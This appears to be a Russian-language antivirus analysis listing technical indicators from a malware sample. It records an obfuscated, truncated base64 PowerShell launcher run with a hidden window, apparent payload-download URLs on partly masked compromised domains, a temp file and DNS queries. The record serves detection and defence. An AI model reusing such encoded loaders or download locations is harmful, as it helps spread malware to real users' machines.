Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABQAHQAMAA4AF8ANABlAD0AKAAnAEMAJwArACgAJwB1AGMAJwArACcAdwAnACkAKwAoACcAaABsACcAKwAnAGUAJwApACkAOwAuACgAJwBuAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAG4AVgA6AHUAUwBFAFIAcA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1428
- %TEMP%\831126.cvr
- 'ac#####sinstitute.com':80
- 'fi####lindia.com':80
- 'su#####contracts.co.uk':80
- http://ac#####sinstitute.com/wp-includes/iLIsBcutT/
- http://su#####contracts.co.uk/sys-cache/K3q/
- http://www.su#####contracts.co.uk/sys-cache/K3q/
- DNS ASK ac#####sinstitute.com
- DNS ASK dd##.#gstudio.in
- DNS ASK fi####lindia.com
- DNS ASK my.###haschool.ir
- DNS ASK de##deal.in
- DNS ASK sp###ypush.com
- DNS ASK su#####contracts.co.uk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABQAHQAMAA4AF8ANABlAD0AKAAnAEMAJwArACgAJwB1AGMAJwArACcAdwAnACkAKwAoACcAaABsACcAKwAnAGUAJwApACkAOwAuACgAJwBuAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAG4AVgA6AHUAUwBFAFIAcA... (со скрытым окном)